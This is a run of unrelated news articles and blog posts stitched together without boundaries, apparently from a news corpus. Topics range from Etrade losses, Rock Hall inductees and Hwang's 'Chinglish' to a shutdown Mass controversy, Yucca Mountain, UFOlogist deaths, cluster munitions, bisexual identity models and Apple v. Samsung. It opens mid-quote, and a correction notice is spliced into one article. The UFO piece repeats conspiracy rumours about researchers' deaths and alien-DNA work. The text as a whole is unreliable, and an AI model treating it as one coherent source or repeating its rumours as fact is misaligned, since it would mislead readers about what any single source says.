`` My plan moving forward is to liquidate mine and wife 's 401k 's and try work out a payment plan with Etrade , '' he concluded . `` I 'm also going to ask them to help out in some way ... thats a longshot . I will pay them and be back trading .... only with set stops this time . What an expensive lesson that was . ''
ABBA Leads Rock and Roll Hall of Fame 2010 Inductees
Five performers are set to join the Rock and Roll Hall of Fame in the year 2010 . ABBA of the famous Mama Mia ! leads the inductees .
Joining the Swedish group are reggae superstar Jimmy Cliff , American rockers The Stooges , British group The Hollies and British rock band Genesis . They were voted by 500 members of the Hall of Fame Foundation .
They are to be honored in a ceremony in New York on March 15 , 2010 . All group bands are saying that they would be performing at the ceremony . The Stooges were rejected the honor seven times in the past . Genesis is still trying to convince Peter Gabriel to participate . ABBA never accepted an offer to appear live together again since 1982 . They were however photographed together in the Swedish premier of the film Mama Mia ! , which is now the highest grossing musical film of all time . Benny Anderson said however that the chances of them showing in the ceremony are 99:1 .
To be inducted to the Hall , a performer 's first recording should have been released at least 25 years ago .
For David Henry Hwang 's 'Chinglish , ' a case of bad timing in China
The playwright wanted to see 'Chinglish ' produced in mainland China , but says the Bo Xilai and Gu Kailai scandal derailed it . It will play a Hong Kong festival .
Instead of going to China , `` Chinglish '' will play briefly at the Hong Kong Arts Festival in early March immediately following its run in Costa Mesa . The Hong Kong engagement is being co-financed by South Coast and Berkeley Repertory Theatre , where the production opened in August .
The Tony Award-winning dramatist learned his own lessons while trying to get the play produced in mainland China — it would have been his first work to be officially produced there — only to see his efforts fall apart .
David Henry Hwang : An article about playwright David Henry Hwang in the Feb. 9 Calendar section said that his latest play , `` Chinglish , '' tells the story of an inexperienced American businessman who owns a sign company and his attempts to navigate China 's mix of free-for-all capitalism and Community Party politics . The latter reference should have been to the Communist Party . —
His latest play , `` Chinglish , '' a comedy that opened on Broadway in 2011 and is now having its local premiere at South Coast Repertory through Feb. 24 , tells the story of an inexperienced American businessman who owns a sign company and his attempts to navigate the country 's mix of free-for-all capitalism and Communist Party politics .
David Henry Hwang knows firsthand about the difficulties Westerners can face while doing business in China .
The Hong Kong trip is a compromise for Hwang , though he said part of his plan was to eventually bring the play to the former British colony .
The playwright recounted his version of recent events during a trip to L.A. in December and by phone from his home in Brooklyn .
`` I wanted to open it in a big city [ in China ] and tour it . That was my dream , '' he said . The playwright thought the substance and tone of the play — as the title suggests , the protagonist faces numerous linguistic hurdles — would generate interest among cosmopolitan Chinese audiences .
He said he began talks with Chinese theater producers early last year , while the play was riding a wave of critical acclaim during its Broadway run . `` I thought we had a good shot at it , '' he said .
Then an unrelated international scandal intervened .
In April 2012 , the story broke involving Bo Xilai , a formerly high-ranking Chinese politician in Chongqing , and his wife , Gu Kailai , the latter of whom was accused of murdering Neil Heywood , a British expatriate businessman . The controversy reportedly involved a disagreement among Heywood , the couple and the couple 's son , who was educated in England .
Gu stood trial last year and confessed to poisoning Heywood . She received a suspended death sentence .
The scandal uncannily mirrors significant portions of the `` Chinglish '' plot . The play features a fictional British expatriate businessman named Peter Timms who has close personal and professional ties to a politically powerful Chinese couple . Timms gradually learns that the couple has been plotting against him behind his back .
The fictional Chinese couple also has a son who has studied abroad in England with the help of Timms .
Hwang wrote `` Chinglish '' before the scandal made international headlines , and said the parallels are completely coincidental . He said that he never met Heywood , the real British businessman , during his research for the play and that Timms `` is a composite of certain expats I 'd met over there . ''
Producers in China backed away from `` Chinglish '' after the story of Bo Xilai and Gu Kailai landed in the news , the playwright said .
`` They felt it would not be a good moment to do the play over there and it would n't get approved '' by Chinese authorities , he said . He emphasized that talks were in the early phases and no dates or venues had been finalized .
Hwang declined to name the producers because he is working on another project with them .
Though many of his plays are set in China , or deal with characters of Chinese descent , none of Hwang 's stage works has ever been produced on the mainland . `` M. Butterfly , '' his Tony-winning 1988 drama about the affair between a French diplomat and a Chinese spy posing as a woman , is still banned .
There are probably few universities that nudge students out the door as rapidly as Princeton , where a humanities student now averages 6.4 years compared with 7.5 in 2003 . That is largely because Princeton guarantees financial support for its more than 2,000 scholars for five years , including free tuition and stipends that range up to $ 30,000 a year . That means students need teach no more than two courses during their schooling and can focus on research .
“ Princeton since the 1930s has felt that a Ph.D. should be an education , not a career , and has valued a tight program , ” said William B. Russel , dean of the graduate school .
And students are grateful . “ Every morning I wake up and remind myself the university is paying me to do nothing but write the dissertation , ” said Kellam Conover , 26 , a classicist who expects to complete his course of study in five years next May when he finishes his dissertation on bribery in Athens . “ It 's a tremendous advantage compared to having to work during the day and complete the dissertation part time . ”
But fewer than a dozen universities have endowments or sources of financing large enough to afford five-year packages . The rest require students to teach regularly . Compare Princetonians with Brian Gatten , 28 , an English scholar at the University of Texas in Austin . He has either been teaching or assisting in two courses every semester for five years .
“ Universities need us as cheap labor to teach their undergraduates , and frankly we need to be needed because there is n't another way for us to fund our education , ” he said .
That raises a question that state legislatures and trustees might ponder : Would it be more cost effective to provide financing to speed graduate students into careers rather than having them drag out their apprenticeships ?
But money is not the only reason Princeton does well . It has developed a culture where professors keep after students . Students talk of frequent meetings with advisers , not a semiannual review . For example , Ning Wu , 30 , a father of two , works in Dr. Russel 's chemical engineering lab and said Dr. Russel comes by every Friday to discuss Mr. Wu 's work on polymer films used in computer chips . He aims to get his Ph.D. next year , his fifth .
Advertisement Continue reading the main story
While Dr. Russel values “ the critical thinking and independent digging students have to do , either in their mind for an original concept or in the archives , ” others question the necessity of book-length works . Some universities have established what they call professional doctorates for students who plan careers more than practitioners than scholars . Since the 1970s , Yeshiva University has not only offered a Ph.D. in psychology but also a separate doctor of psychology degree , or Psy.D. , for those more interested in clinical work than research ; that program requires a more modest research paper .
OTHER institutions are reviving master 's degree programs for , say , aspiring scientists who plan careers in development of products rather than research .
Those who insist on dissertations are aware that they must reduce the loneliness that defeats so many scholars . Gregory Nicholson , completing his sixth and final year at Michigan State , was able to finish a 270-page dissertation on spatial environments in novels like Kerouac 's “ On the Road ” with relative efficiency because of a writing group where he thrashed out his work with other thesis writers .
“ It 's easy , especially in our field , to feel isolated , and that tends to slow people down , ” he said . “ There 's no sense of belonging to an academic community . ”
Some common sense would also hasten the process . The dissertation is a hurdle that must be cleared , not a magnum opus , the capstone of a career . Princeton 's Mr. Wu has made that calculation .
“ You do not want to stay forever , ” Mr. Wu said . “ It 's a training process . ”
Our government is out of control .
First , it was the World War II veterans who had to break down barriers to see the open air , un-attended memorial erected in their honor . A memorial which is on public land but is supported – including the National Park Service fee – with private funds . This week there was more security surrounding this memorial — just to keep elderly veterans out — than there was at our embassy in Benghazi the night it was attacked .
And for what ? To inflict as much pain as possible through this government shutdown . It 's called Washington Monument Syndrome , and it 's pure political theater .
But now there 's a story just coming to light that takes things even further . According the Archdiocese for Military Services , GS and contract priests ( who are paid by the federal government as independent contractors in places where there are n't enough active-duty priests to meet the needs of Catholics in military service ) are being forbidden from celebrating Mass , even on a volunteer basis .
If they violate this restriction , they face possible arrest . FOR CELEBRATING MASS .
From John Schlageter , General Counsel for the Archdiocese :
There is a chronic shortage of active duty Catholic chaplains . While roughly 25 % of the military is Catholic , Catholic priests make up only about 8 % of the chaplain corps . That means approximately 275,000 men and women in uniform , and their families , are served by only 234 active-duty priests . The temporary solution to this shortage is to provide GS and contract priests . These men are employed by the government to ensure that a priest is available when an active duty Catholic Chaplain is not present . With the government shutdown , GS and contract priests who minister to Catholics on military bases worldwide are not permitted to work – not even to volunteer . During the shutdown , it is illegal for them to minister on base and they risk being arrested if they attempt to do so . As an example , if a Catholic family has a Baptism scheduled at the base chapel at Langley AFB this weekend , unless they can locate a priest who is not a GS or contract priest , they should consider it cancelled . Likewise , a Marine who attends Sunday Mass at the Quantico Chapel will have to go elsewhere this weekend . If you are a Catholic stationed in Japan or Korea and are served by a Contract or GS priest , unless you speak Korean or Japanese and can find a church nearby , then you have no choice but to go without Mass this weekend . Until the Federal Government resumes normal operations , or an exemption is granted to contract or GS priests , Catholic services are indefinitely suspended at those worldwide installations served by contract and GS priests . At a time when the military is considering alternative sources of funding for sporting events at the service academies , no one seems to be looking for funding to ensure the Free Exercise rights of Catholics in uniform . Why not ?
This shutdown impacts Catholics in the military worldwide . In the DC-metro area , it specifically impacts bases like Quantico . On the Facebook page for the Archdiocese , Catholic military members commenting on the story are not happy . Comments include :
“ This is outrageous ! ! ! Especially threatening them with arrest to voluntarily do their job. ” “ Unbelievable ! I was worried about this because our priest is contracted as well . It is bad enough to be furloughed but to not have a Mass to attend , is a real downer , ” “ Just one example , a couple is getting married tomorrow at a large Air Force Base that is staffed by a Contract priest . That priest did all of their marriage prep , and has gotten to know the couple very well over the past few months . But with the shutdown , he can not perform their wedding . Instead of the priest that the couple has come to know and love , an active duty priest has to be sent in to perform the wedding of two people who are strangers to him and he to them. ” ” Is anyone up there going to start a protest ? ! A rosary ? ! ? ! ? A nice Catholic riot maybe ? ! PLEEEAAASSEEE ? ! SOMEONE ? ! ANYONE ? ! Any real Carholics out there ? ! ! ! ! ? ? ? ! ”
This is outrageous . It is a violation of the First Amendment . It is a prohibition of the free exercise of religion to order priests under penalty of arrest that they can not volunteer their time to offer Mass to the faithful on base . This can not be allowed to stand .
As of this writing , I have not yet received a response to my inquiry to the Archdiocese for Military Services as to what specific action steps we can take to get this problem addressed . Until we have a path to resolution , please share this story as widely as possible . Make people aware that Catholics serving our country are being forcibly denied access to the sacraments . These are the lengths the administration and the Democrats in Congress are willing to go to in order to continue inflicting as much pain as possible on the American people during the shutdown .
UPDATE – 10/4/2013 @ 12:34PM : I received a response from the Military Archdiocese . Mr. Schlageter writes with a correction and additional information from the original release :
There will be Mass at Quantico because of the terms of service of the contract for the priest at Quantico . Nonetheless , 3 Masses have been cancelled at local Fort Belvoir . I have been told but can not confirm that Mass has been cancelled at the Navy yard . In one situation a couple that is to be married at an Air Force Base this Saturday and did all of their preparation with a GS priest will now be married by an active duty priest who is being taken in from somewhere else . This means that the priest that the couple got to know over the past few months will not be able to witness their marriage . One priest in Virginia Beach will be celebrating Mass in a local park off base . We are also learning that some chapel musicians will not be able to play at Sunday Mass during the furlough . I think that the best thing people can do is to get the message out . I would suggest that they contact their local members of Congress , but in those cases where parishes are located next to a military base that will not have Sunday Mass , that people be kind and welcoming to their military brothers and sisters and their families .
Please do contact your local member of Congress and welcome our service members into your parishes . And continue to spread the message about these restrictions .
UPDATE – 10/4/2013 @ 2:32PM :
I just got word that while the Navy Yard is staffed with an active-duty priest who will not be impacted by the shutdown , the GS priest at the nearby Joint Base Anacostia-Bolling is furloughed . Since Anacostia-Bolling has the larger chapel , the active duty priest from Navy Yard will be celebrating Sunday Mass at Anacostia-Bolling instead of Navy Yard . The Catholic Community at the Navy Yard has been invited to attend Sunday Mass at Anacostia Bolling .
The views expressed here are those of the author , and do not necessarily represent the views of CatholicVote.org
Highly radioactive waste will likely accumulate in Minnesota for decades longer than expected because of a new energy policy taking shape in Washington . President Obama is closing the door on Yucca Mountain , a remote site in Nevada that for more than 20 years has been the nation 's only candidate for permanent burial of nuclear waste . That leaves the waste containers collecting at nuclear plants near Monticello and in Red Wing , with nowhere to go . `` President Obama has been emphatic that storage at Yucca Mountain is not an option , period , '' said Stephanie Mueller , spokesperson for the U.S. Department of Energy . `` His budget reflects that , and funding for the project will be reduced and restricted . '' Nuclear utilities including Xcel Energy hoped to ship wastes to Nevada beginning around 2020 , but they have seen the opening date postponed many times . The project has encountered high costs , environmental concerns and steadfast opposition from Nevadans , including Senate Majority Leader Harry Reid . Terry Pickens , director of nuclear regulatory policy for Xcel , said he 's not surprised that the administration wants to drop Yucca Mountain , since Obama promised to do so when he campaigned in Nevada . However , there may be a fight ahead . `` The administration ca n't do anything that it wants , '' Pickens said , noting that Congress endorsed Yucca in 2002 . `` To undo that , it will take some conscious effort , '' Pickens said . Xcel has a large , stainless steel-lined indoor pool and 24 outdoor casks full of radioactive wastes at its Prairie Island plant in Red Wing . The utility can fill five more containers and is seeking state approval for 35 more casks if it gets the OK to extend Prairie Island 's license for another 20 years . Xcel also has a waste storage pool at its Monticello plant northwest of the Twin Cities and has loaded 10 of the 30 outdoor canisters permitted there .
Pickens said a change in direction about Yucca Mountain will not cause the utility to shut down its plants or reduce the amount of power they generate . Wastes can be stored safely and securely for several decades if necessary , he said . Rejecting Yucca Mountain may raise uncertainty about nuclear power just as the industry is promoting its superiority to coal and other fuels that produce global warming emissions . Nuclear trade association leaders suggested an independent panel or commission to reevaluate the waste problem . The Yucca move should make Minnesota think twice about repealing a moratorium on new nuclear plants that the Legislature passed in 1994 , said Steve Morse , executive director of Minnesota Environmental Partnership . Legislators have proposed to lift the prohibition and may discuss the issue later this month . Morse was a state senator in 1994 , when the controversy of additional radioactive waste storage at Prairie Island boiled over at the Legislature . Utility officials assured lawmakers then that the storage would be temporary and that wastes would eventually be shipped to Nevada . `` Those projections have always been fantasies , '' Morse said . Diane Jensen , one of the environmental leaders active in that debate , said that in some respects , nothing has changed in 15 years . `` There 's a saying that nuclear waste tends to stay where you first put it , '' Jensen said . `` It will never be moved because the dangers politically and environmentally are far greater than leaving it where it is . '' The Department of Energy has spent more than $ 10 billion boring a nearly 5-mile tunnel through Yucca Mountain , drilling niches for testing , and it had been conducting hundreds of studies to determine whether wastes can be stored there safely for thousands of years . Last year DOE submitted an application for a construction and operating license for Yucca to the Nuclear Regulatory Commission .
Suicides , Murders , and Mysterious Deaths Prevalent Among UFOlogists
Could Ufology be one of the most dangerous professions in the world ? Throughout the last few decades , Ufologists have been the unfortunate subjects of a wide range of mysterious deaths , leading to an equally varying number of conspiracy theories .
Many UFO researchers believe that these deaths are at the hands of the government , but a few believe that they are the work of aliens themselves , in order to cover up their presence on Earth , according to Nigel Watson , author of The Haynes UFO Investigations Manual . `` Many of these cases could be coincidences or people trying to make something out of nothing - but there are certainly some strange incidents , '' Watson said .
This pattern has been theorized since as early as 1971 , when science fiction author and UFO researcher Otto Binder wrote an article discussing a pattern composed of up to 137 deaths of `` flying saucer researchers , writers , scientists , and witnesses '' during the 1960 's , `` many under the most mysterious circumstances . '' Today , UFOlogists who believe in this conspiracy place death toll estimates at up to 300 .
Leading UFO researcher Steve Basset , who won Researcher of the Year at the 2014 International UFO Conference , discussed his perception of a pattern , or `` cluster , '' of mysterious deaths of UFOlogists that may be connected to the government , a pattern which began as early as 1947 . `` What we are looking for are death clusters which by their nature and proximity sit out from the background noise . I try to be careful with my language in order to minimize upset with family members . There are a number of death clusters relating to various issues over the past 20 years . If government-connected then that 's not good . Not good at all .
`` This is a difficult matter to engage as it is impossible to prove individual events . What I am doing is raising concern over a death clusters which stands out from the background noise . This is risky as family members could be offended . I never say with certainty that a particular case is a murder . And I would n't go there at all if it was n't the only option to perhaps prevent further such deaths - publicity . ''
Here are a few of the strangest stories :
Phil Schneider
According to UFOlogists , after giving a series of lectures about UFOs and government conspiracies , UFO researcher Phil Schneider became increasingly concerned about his own safety and the safety of his family . He told friends that government vans were following him and had occasionally tried to run him off of the road . Then in January 1996 , a friend found his body in his apartment after it had been decomposing for several days . The medical examiner found that he had committed suicide by wrapping rubber tubing around his neck . His wife insisted that he had previously told her , `` If I ever 'commit suicide , ' then you 'll know I was murdered , '' and that all of his research materials on aliens and UFOs were missing .
Marilyn Monroe
UFOs also played a role in one of the many conspiracy theories involving the death of Marilyn Monroe . There were rumors that she was murdered and her suicide staged as a result of her knowledge of extraterrestrials at Roswell . A purported CIA wiretap document , dubbed The Marilyn Monroe Document and dated two days before Monroe 's death , contains references to Monroe 's plans to hold a press conference and `` tell all '' about Roswell , as well as a reference to the alleged secret government agency Majestic 12 , an organization tasked with concealing the existence of extraterrestrial life from the public .
Milton William Cooper
A prominent conspiracy theorist , Cooper spent much of his life trying to convince the public that the government was not only concealing the existence of UFOs , but that they were working with the Illuminati to create a New World Order . Cooper believed that aliens `` manipulated and/or ruled the human race through various secret societies , religions , magic , witchcraft , and the occult '' and claimed to have seen classified documents that detailed the Navy 's direct contact with extraterrestrials ( although other UFOlogists claimed that they had written some of the documents cited by Cooper as pranks ) . In 2001 , local Arizona police attempted to arrest him for aggravated assault . He tried to flee the premises , and then opened fire on the deputies . One of the police officers was shot in the head , and Cooper was fatally shot by US Marshals . He had been pursued by marshals ever since a 1998 charge of tax evasion , and had vowed that he would `` never be taken alive . ''
Recent Stories
In February 2009 , the body prominent crop circle researcher Paul Vigay , who was a consultant on the M. Night Shayamalan film Signs , was found floating in the sea off the coast of Portsmouth . He had ended a long-term relationship the night before , and was $ 10,000 in debt , but his family insisted that he did n't believe in suicide and his autopsy was inconclusive . The Telegraph termed his death `` a mystery . ''
In December 2008 , Claudie Haignere , the first French woman to go to space and a scientist who was supposedly at the forefront of alien-human DNA research , was rushed to the hospital after an apparent suicide attempt . She was rumored to have said , `` Earth must be warned ... '' before slipping into a coma induced by an overdose of sleeping pills .
Is there enough evidence to suggest that foul play is at foot ? Probably not , but if you 're out there researching the UFO phenomena , there 's probably enough to make you look over your shoulder every once in a while .
The United States should make its suspension of cluster munition transfers to Saudi Arabia permanent and extend it to all other countries , Human Rights Watch said today .
Expand A submunition or `` skeet '' from a BLU-108 canister from a CBU-105 Senor Fuzed Weapon found by the main road between Sanaa and Saada , about 250 meters south of the al-Amar village on May 16 , 2015 . © 2015 Ole Solvang/Human Rights Watch
Human Rights Watch has independently confirmed a report in Foreign Policy on May 27 , 2016 , that the White House has directed US officials to halt transfers of cluster munitions to Saudi Arabia immediately . The decision follows reports by Human Rights Watch , Amnesty International , the United Nations , and others , of harm to civilians from the weapons in Yemen , where Saudi Arabia has led a military operation against Houthi forces , also known as Ansar Allah , since March 26 , 2015 .
“ The decision not to transfer any more cluster munitions to Saudi Arabia is a step in the right direction , but the US should halt all cluster munition transfers to any country and make that suspension permanent , ” said Steve Goose , arms director at Human Rights Watch and chair of the Cluster Munition Coalition . “ This would help bring the US into line with core obligations of the international treaty banning cluster munitions . ”
In a June 1 interview with MSNBC 's Chris Hayes , Secretary of State John Kerry expressed concern at the high number of civilian casualties in the Yemen conflict . Kerry did not address cluster munitions , but did not deny the host 's statement that the administration has decided to stop deliveries of these weapons .
Cluster munitions , which contain multiple smaller submunitions or bomblets , are dropped from aircraft or delivered from the ground by artillery and rockets . They pose an immediate threat to civilians as they disperse over a wide area and also leave explosive remnants , including submunitions that fail to explode upon impact and become de facto landmines .
Cluster munitions are prohibited by a 2008 treaty signed by 119 countries , though not by the US , Yemen , or Saudi Arabia , and its coalition partners Bahrain , Egypt , Jordan , Kuwait , Morocco , Qatar , and Sudan . At a diplomatic meeting in Geneva on May 19 , Yemen 's representative stated that the government is considering accession to the Convention on Cluster Munitions following use of the weapons in his country .
In the past year , Human Rights Watch has documented civilian casualties in Yemen from the Saudi-led coalition 's use of four types of air-dropped and ground-launched US-made cluster munitions . This includes the use of CBU-105 Sensor Fuzed Weapons in at least six airstrikes in the governorates of Amran , Hodaida , Saada , and Sanaa .
The CBU-105 is prohibited under the international ban treaty . US export law provisions dating to December 2007 , permit the transfer of cluster munitions with a failure rate of less than 1 percent as long as they are not used in civilian areas . The CBU-105 is the only type of cluster munition exported by the US since 2008 . According to the US Department of Defense , the recipient must agree that “ the cluster munitions and cluster munitions technology will be used only against clearly defined military targets and will not be used where civilians are known to be present or in areas normally inhabited by civilians . ”
Research by Human Rights Watch has demonstrated that Saudi Arabia has used CBU-105 Sensor Fuzed Weapons in or near civilian areas of Yemen . The research also found multiple examples of the weapons not functioning in ways that meet the 1 percent reliability standard .
The most recently recorded CBU-105 attack documented by Human Rights Watch in Yemen was on February 15 , near a cement factory in Amran governorate . Markings on the remnant of the CBU-105 bomb casing and its inventory control sticker collected from the site of the attack and photographed by Human Rights Watch show that the weapon was manufactured in July 2012 , by Textron Systems Corporation of Wilmington , Massachusetts .
Expand Markings on the remnant of the CBU-105 bomb casing and its inventory control sticker show that the weapon was manufactured in July 2012 by Textron Systems Corporation of Wilmington , Massachusetts . © 2016 Human Rights Watch
The US concluded a contract with Textron Defense Systems in 2013 , for the manufacture of 1,300 CBU-105 Sensor Fuzed Weapons for delivery to Saudi Arabia by December 31 , 2015 . However , as Foreign Policy also noted , US officials have repeatedly refused to clarify whether all the cluster munitions have been delivered , and Textron has said it does not comment on delivery dates .
Saudi Arabia has repeatedly denied using other types of cluster munitions in Yemen , but it has admitted using CBU-105 Sensor Fuzed Weapons once , in April 2015 , “ against armored vehicles. ” None of the CBU-105 attacks documented by Human Rights Watch in Yemen have involved armored vehicles nor have any damaged or destroyed armored vehicles been documented at the strike locations .
The UAE has acknowledged stockpiling CBU-105 Sensor Fuzed Weapons , but denies using them in Yemen .
The use of cluster munitions in Yemen since April 2015 has received worldwide media coverage , provoked a public outcry , and has been condemned by dozens of countries as well as by a European Parliament resolution . In September 2015 , more than 60 nations at the First Review Conference of the Convention on Cluster Munitions expressed deep concern at the use of cluster munitions in Yemen and issued a declaration condemning “ any use of cluster munitions by any actor . ”
Human Rights Watch chairs the Cluster Munition Coalition U.S. , which has called on President Barack Obama to review the June 2008 policy directive by then-Secretary of Defense Robert Gates and remove the exception allowing for cluster munitions that result in a less than 1 percent unexploded ordnance rate .
“ Saudi Arabia should heed US concerns about civilian harm from its cluster munition attacks in Yemen and immediately stop using these weapons , ” Goose said . “ Saudi Arabia and its coalition partners should destroy rather than use any remaining stocks of cluster munitions and provide assistance to clear cluster munition remnants on the ground in Yemen . ”
There are many identity development models for gay and lesbian people out there , and the Cass Identity Development Model is one of the most familiar – for example , the Cass Model is the only one I have ever run across in a classroom . For bisexual ( and trans * ) people , the Cass Model just does n't quite fit . ( If you need a refresher on Cass , go here and get the full text , and if you just want some Mama Cass , go here and here . Do n't worry , I 'll wait for you to get back . If you 've only encountered Cass in summary form , I strongly encourage you to go read the original , though . )
Everyone back ? Good , I had just enough time for a Hot Pocket .
According to the original Cass Model , the first stage is confusion and hiding . So far , so good . That 's where , in a heteronormative society , we all start – noticing that we may be different , wondering what it means , and hiding it , often from ourselves as well as others .
The second stage is comparison . According to Cass , the strategies here include passing – being in the closet . Here 's a fundamental truth about the queer experience , something that I would say is a universal truth , at least in the societies we live in ; we all start off in the closet . Because of the normative assumption that everyone is straight until proven otherwise , every person who identifies as queer has to at some times declare it in some way .
The part that raised my hackles , though , was when she goes on to describe and dismiss bisexuality as merely a transitional strategy , and not as a social one , but as a fancy way of lying to yourself .
This is what 's being taught in University courses on queer . This is the model that people studying homophobia and heterosexism , students of psychology and social justice , are being given as possibly their only academic resource . No wonder the stereotype of the confused and self-deceiving actually-gay-but-pretending-to-be-bi is so robust . No wonder therapists ( straight and gay ) and Allies like the well-meaning parents who told their queer son to “ pick one ” screw up bi-identified people so often !
In the third stage of this model , identity tolerance , you start to accept who you are . One of the keys to this , according to Cass , is “ [ seeking ] out homosexuals and the homosexual subculture. ” Obviously if you reach out to queer culture and get told negative and biphobic things , you 're either going to crawl back in the closet due to lack of support or just throw your hands in the air and repudiate all labels or , if you 're like me , get furious . And Loud .
( A note : throwing away all labels makes community support more difficult , rather than less . It 's like saying we live in a post-racial society so we just should all call ourselves humans . It does n't work there , and it does n't work here , because you 're not just excluding yourself , you are excluding everyone who is trying to find you so they can see they are not alone . People are not going to quit labeling you because you choose to eschew labels – you 're just giving up control of how you identify . )
Stage 4 , acceptance , is characterized by increasing contact with the community and stage 5 , Pride , is in large part rejection of heterosexuality . “ P not only accepts a homosexual identity but prefers it to a heterosexual one. ” Now this is all well and good for people who are monosexual . But according to this model , if you are bisexual , you are only moving to the next stage if you reject… part of yourself . What a bind to be put in . And again , this is what 's being taught . This is the model that bisexuals are being measured against .
This is why Pride festivals have one booth for bis off in a back corner – not even next to the porta-potties , because then people would have to walk by us , but out in the hinterlands . This is why people use “ gay and lesbian ” as a term for LGBT – because our acknowledging and embracing our “ heterosexual ” attractions as well as our same-gender feelings must be rejected in the very name of Pride .
Stage 6 is synthesis , where identity becomes less of a prime issue and just part of who you are . Community support , again , is essential to this stage .
This is not a satisfying model . Not only does it erase and devalue bisexuality in the individual ( as well as trans * folk who identify as heterosexual – wait , what ? People who are transcending or transitioning their gender can identify as straight ? You bet your boots they can , and some do , which is another reason that rhetoric about “ not seeing gender ” can be invalidating for someone who is fighting an endless everyday battle to be seen as the gender they actually are rather than that assigned at birth ) but it also leads to a community perception of bisexuality as The Hated Other . It entrenches biphobia in the name of self-acceptance , and in academia and everything that comes out of academia – professional training , research , you name it .
I am obviously not the first or only person to notice this – I linked to a look at it a few articles back , and Tom Brown discussed it at length in his 2002 article on bisexual identity development .
Brown looks at Weinberg 's no-order idea of “ Suspect , Engage , Label ” , which is a great jumping-off point . You Suspect you 're different , you Engage yourself and the outside world and the queer community , you Label as a way of finding others and affirming your identity , and you do n't necessarily do it in any particular fashion . Brown also looks at Weinberg et al 's 4-stage model , which ends with “ Continued Uncertainty ” , and highlights in particular the importance of community .
From the article , emphasis mine :
Insufficient social validation , including a lack of bisexual role models and communities , was hypothesized to contribute to this Continued Uncertainty . For others , this confusion may have resulted from the need to change to a lesbian or gay self-label in order to be accepted in homosexual communities . For women , a lack of social support for bisexuality may carry over into some feminist communities or negatively impact their feminist identity . [ … ] Members of both sexes cited being in a monogamous relationship as contributing to their Continued Uncertainty . ”
The only interpretation of this that makes any sense to me is that this stage of Continued Uncertainty is something imposed , something external , that may become internalized . Biphobia from without becomes biphobia within . Brown also notes that Weinberg et al . question the ability of bisexuals to have robust identity development specifically due to “ the dearth of bisexual resources outside of San Francisco ” ( to which I add , 14 years after this research , places like Boston , NY , MPLS… large urban centers that have things like the BRC and NYABN and BOP ) .
The urbanization of gay that started rolling after WW2 , while it has benefited us as queers , has not really happened for or specifically benefited bisexuals in a comparable way . And no wonder ! What 's the point of migrating to a “ gay city ” if you are going to face the same stereotyping and rejection that you can get just as easily in Podunk ? Why not just keep your head down and install new drapes in your closet ?
If the rejection of bisexuality by large elements in the GL community makes us look smaller by keeping us in the closet ( and here I mean both the straight closet that we all start in and the gay closet where we give up and just identify as Anything But Bisexual ) , then it becomes a self-fulfilling prophecy . “ Where 's the community to come out to ? Nowhere . So I wo n't come out , then , I can manage my feelings of threat better by remaining isolated. ” Then along comes the next person , who ca n't find the bi community either…
Brown makes a big deal , quite rightly , about the need for community support . Over and over , studies are showing that mental health , personality integration , and overall happiness are strongly related to belonging to a community . Aristotle and Plato knew it 2000 years ago , we know it today – even the lone wolves have to have a community to support them . Brown 's model explicitly states that “ A person in a nonsupportive community may have difficulty maintaining [ hir ] identity . ”
Brown 's Model of Bisexual Identity Development is four stages ( because let 's face it , as humans , we looove to frame development as stages ) that mirror the first three of Weinberg 's and then expand on stability . Stage one is Confusion , because we all start there – it 's just that we do n't stay there . Stage two is Finding and Applying the Label . ( This , by the way , is one of the reasons I am so concerned about label issues . It 's not Oppression Olympics , it 's not a peculiar fascination with semantics and terminology , it is an important piece in how we fully become who we are , and it frankly perturbs me to see mislabeling applied from monosexuals and non-monosexuals alike . ) Stage three is Settling Into the Identity .
Quoting Brown again – “ …it is important for the bisexual person to have a supportive social network or significant other available. ” ( This would be a good time for a shout-out to BiNet USA http : //www.binetusa.org/ and the BRC http : //www.biresource.net/bisexualgroups.shtml and the UK Bisexual Index http : //www.bisexualindex.org.uk/index.php/BiInTheUK )
Brown calls the fourth stage Identity Maintenance . This is where we live in the community and become the resource for those who are seeking others like themselves – like ourselves .
One of the things the Identity Development Models all have in common is the need for community support . In the early days , there was n't any , and I salute the brave pioneers who bootstrapped themselves against all opposition , who provided support for the next wave and who the great activist organizations sprang from – even when they conflicted with the establishment , groups like ACTUP were grounded in and empowered by the organizations that saw support and sociality as their key missions rather than getting in people 's faces , and I do not want to see the horrible circumstances that made ACTUP a necessity repeated .
There are differences between the bootstrappers and the situation today , but there are similarities as well . We are all bootstrappers in a sense , lifting ourselves out of isolation , but it makes a difference when you get pushback from members of the queer community , like the person on HuffPo who recently called me a “ pearl-clutcher ” because I pointed out ze was not being supportive in a comment on an article about lack of support – I was metaphorically being told to shut up , sit down , and get back in the closet because obviously Trans * folk have more problems than I do .
Of course , that part did n't come up until after we were told that gay people have worse problems than bi people because we do n't have to deal with homophobia – a particularly nasty bit of biphobia , because straight people that bully kids unto death or leave them to die after a beating do n't ask for labels , they just scream “ kill the faggot ” . People who bully , beat , and kill trans * folk do n't ask them to parse their exact sexuality and gender identity , they just Hate with a capitol H , and I am certain that there were trans * folk reading that comment who shook their heads and said , “ Way to alienate the part of the queer community that stood up for us when the Lesbian and Gay Gender Police told us we did n't belong in their cisgendered queer spaces . ”
We have to support each other . One way to do this is to develop , use , and teach models of queer identity development that do n't leave out half the people Under The Rainbow .
Advertisements
The CDC 6600 Architecture
The CDC6600 and its family members are part of the computer industry history . A decade before the Cray 1 , the members of the CDC6000 family were not only expensive and the most powerful systems at the time of introduction . They were also lean and wonderful architectures ! The elegance was also conveyed in several publications ( many by CDC ) , where all the necessary knowledge was explained from the ground up . All you needed to know was supplied , clearly laid out , not just hints for efficient programming . Basicly , you could rebuild your own computer by reading these books . 50 years later , they are invaluable reminders and tools , we can see where the computer industry comes from and realise that it is not that hard to do it ourselves , too . Thanks everybody for the great work !
These PDF files are mostly mirored from http : //www.bitsavers.org/pdf/cdc/ . See also Scott 's page at http : //www.standardpascal.org/cdc6400.html . Thank you !
yg - 2012/01/13
Other links :
After delivering a speedy $ 1.05 billion verdicts against Samsung on Friday , the nine Apple v. Samsung jurors were escorted out a rear exit by court staff , leaving the throng of waiting reporters with no information on how the verdict was reached .
Now we know at least part of the answer . The nine-person panel believed that Samsung had taken a `` calculated risk , '' and they believed that Samsung `` knew or should have known what they were doing was infringing , '' jury foreman Velvin Hogan said in an interview today with his hometown newspaper , the San Jose Mercury-News .
